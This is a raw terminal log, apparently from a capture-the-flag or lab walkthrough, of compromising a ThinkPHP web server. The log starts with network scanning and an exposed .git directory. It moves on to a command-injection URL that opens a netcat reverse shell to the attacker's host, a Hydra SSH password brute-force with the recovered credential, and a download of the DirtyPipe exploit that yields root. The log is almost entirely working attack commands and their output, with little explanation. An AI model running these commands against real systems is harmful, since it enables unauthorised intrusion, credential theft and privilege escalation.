┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c: 29: ff: 66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a: 00:27:00:00:10       (Unknown: locally administered)
192.168.31.2    08:00:27:9b: 1b: f6       PCS Systemtechnik GmbH
192.168.31.254  08:00:27: b6: dd: 51       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.436 seconds (105.09 hosts/sec). 3 responded

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.254 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 01:56 EDT
Nmap scan report for change.dsz (192.168.31.254)
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy
MAC Address: 08:00:27: B6: DD: 51 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.21 seconds

┌──(root㉿kali)-[~/Desktop/tmp]
└─# dirsearch -u "http://192.168.31.254:8080/"
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py: 23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/tmp/reports/http_192.168.31.254_8080/__25-07-25_01-56-44.txt

Target: http://192.168.31.254:8080/

[01:56:44] Starting:
[01:56:44] 403 -  281B  - /%3f/
[01:56:46] 301 -  322B  - /.git  ->  http://192.168.31.254:8080/.git/
[01:56:46] 200 -  414B  - /.git/branches/
[01:56:46] 200 -  605B  - /.git/
[01:56:46] 200 -   73B  - /.git/description
[01:56:46] 200 -  263B  - /.git/config
[01:56:46] 200 -  675B  - /.git/hooks/
[01:56:46] 200 -   21B  - /.git/HEAD
[01:56:46] 200 -    7KB - /.git/index
[01:56:46] 200 -  461B  - /.git/info/
[01:56:46] 200 -  179B  - /.git/logs/HEAD
[01:56:46] 200 -  483B  - /.git/logs/
[01:56:46] 200 -  240B  - /.git/info/exclude
[01:56:46] 301 -  332B  - /.git/logs/refs  ->  http://192.168.31.254:8080/.git/logs/refs/
[01:56:46] 301 -  340B  - /.git/logs/refs/remotes  ->  http://192.168.31.254:8080/.git/logs/refs/remotes/
[01:56:46] 301 -  347B  - /.git/logs/refs/remotes/origin  ->  http://192.168.31.254:8080/.git/logs/refs/remotes/origin/
[01:56:46] 301 -  338B  - /.git/logs/refs/heads  ->  http://192.168.31.254:8080/.git/logs/refs/heads/
[01:56:46] 200 -  179B  - /.git/logs/refs/remotes/origin/HEAD
[01:56:46] 200 -  112B  - /.git/packed-refs
[01:56:46] 301 -  333B  - /.git/refs/heads  ->  http://192.168.31.254:8080/.git/refs/heads/
[01:56:46] 200 -  467B  - /.git/objects/
[01:56:46] 301 -  335B  - /.git/refs/remotes  ->  http://192.168.31.254:8080/.git/refs/remotes/
[01:56:46] 301 -  342B  - /.git/refs/remotes/origin  ->  http://192.168.31.254:8080/.git/refs/remotes/origin/
[01:56:46] 200 -   30B  - /.git/refs/remotes/origin/HEAD
[01:56:46] 200 -  475B  - /.git/refs/
[01:56:46] 301 -  332B  - /.git/refs/tags  ->  http://192.168.31.254:8080/.git/refs/tags/
[01:56:47] 200 -  115B  - /.gitignore
[01:56:47] 404 -  278B  - /.gitignore/

┌──(root㉿kali)-[~/…/gitTools-v0.0.1/Dumper/GitDump/output]
└─# git checkout -- .
error: unable to read sha1 file of .gitignore (5054a67e564790fb2303e60414d251eef5847227)
error: unable to read sha1 file of .htaccess (e69de29bb2d1d6434b8b29ae775ad8c2e48c5391)
error: unable to read sha1 file of .travis.yml (36f7b6f90dafe374d0eca306886df83f09ff13a9)
error: unable to read sha1 file of LICENSE.txt (8d94897d94b3c8db8400259fec20d33a4f252827)
error: unable to read sha1 file of README.md (05c7b838fb24a9dd309e77d3428c7cb06495f3a1)
error: unable to read sha1 file of app/.htaccess (3418e55a68383c1cbc687c52a2994d1e8ed83800)
error: unable to read sha1 file of app/AppService.php (96556e88e2abe4becd210e99166be1ad855c5cf5)
error: unable to read sha1 file of app/BaseController.php (025ed07bf114971b4218d92061fb35cce94d3a79)
...

┌──(root㉿kali)-[~/…/Dumper/GitDump/output/.git]
└─# cat config
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[remote "origin"]
        url = https://github.com/LSP1025923/thinkphp.git
        fetch = +refs/heads/*: refs/remotes/origin/*
[branch "main"]
        remote = origin
        merge = refs/heads/main

system,shell_exec,proc_open,pcntl_exec,dl

http://192.168.31.254:8080/think/admin/hello/a/busybox%20nc%20192.168.31.129%204444%20-e%20bash/b/passthru

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# hydra -l welcome -P ./pwd 192.168.31.254 ssh -vV -I -f
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
。。。
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-25 02:19:41
[22][ssh] host: 192.168.31.254   login: welcome   password: eecho

welcome@tpN:~$ busybox wget 192.168.31.129/les.sh
Connecting to 192.168.31.129 (192.168.31.129:80)
les.sh               100% |*************************************************************************| 90858  0:00:00 ETA
welcome@tpN:~$ chmod +x ./les.sh
welcome@tpN:~$ ./les.sh

Available information:

Kernel version: 5.8.0
Architecture: x86_64
Distribution: N/A
Distribution version: N/A
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: N/A

Searching among:

81 kernel space exploits
0 user space exploits

Possible Exploits:

[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops

   Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
   Exposure: probable
   Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
   Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

┌──(root㉿kali)-[~/Desktop/script]
└─# proxy curl https://haxx.in/files/dirtypipez.c
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  192.168.11.1:7890  ...  haxx.in:443  ...  OK
dear botnet herder/scriptkiddie:

due to ongoing abuse complaints about bad actors(tm)
leeching exploit code from my domain (haxx.in) directly
to vulnerable hosts I've had to make some adjustments
to my setup. I would strongly suggest you re-host any
exploit code you found on my website, its better for
your own operational security anyway.

thanks for your understanding.

kind regards,
blasty

welcome@tpN:~$ proxy curl https://haxx.in/files/dirtypipez.c -H "User-Agent: 123" -O
welcome@tpN:~$ gcc dirtypipez.c -o dirtypipez
welcome@tpN:~$ ./dirtypipez /bin/su
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))
# id
uid=0(root) gid=0(root) groups=0(root),1000(welcome)